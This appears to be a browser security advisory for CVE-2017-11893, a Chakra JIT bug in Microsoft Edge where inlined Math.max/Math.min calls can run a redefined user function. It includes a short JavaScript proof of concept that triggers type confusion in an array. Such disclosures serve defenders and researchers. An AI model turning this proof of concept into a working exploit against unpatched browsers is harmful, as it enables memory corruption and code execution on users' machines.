Microsoft Edge Chakra JIT has an issue where Op_MaxInAnArray and Op_MinInAnArray Misuse can explicitly call user defined JavaScript functions.
077ed40c3d16dd77486c3f7c155974d8Microsoft Edge: Chakra: JIT: Op_MaxInAnArray and Op_MinInAnArray can explicitly call user defined JavaScript functions
CVE-2017-11893
1. Call patterns like "Math.max.apply(Math, [1, 2, 3, 4, 5])" and "Math.max.apply(Math, arr)" can be optimized to directly call the method "JavascriptMath::MaxInAnArray" in the Inline Phase.
2. The method takes the original method "Math.max" as the first parameter and the arguments object as the second parameter.
3. If the arguments object can't be handled by the method, it explicitly calls the original method "Math.max".
4. But it doesn't check if the property "Math.max" has changed, so a user defined JavaScript function can be called without updating "ImplicitCallFlags".
Note: Math.min as well.
PoC:
function opt(arr, arr2) {
arr[0] = 1.1;
Math.max.apply(Math, arr2);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3, 4.4];
for (let i = 0; i < 10000; i++) {
opt(arr, [1, 2, 3, 4]);
}
Math.max = function () {
arr[0] = {};
};
opt(arr, {}); // can't handle, calls Math.max
print(arr[0]);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt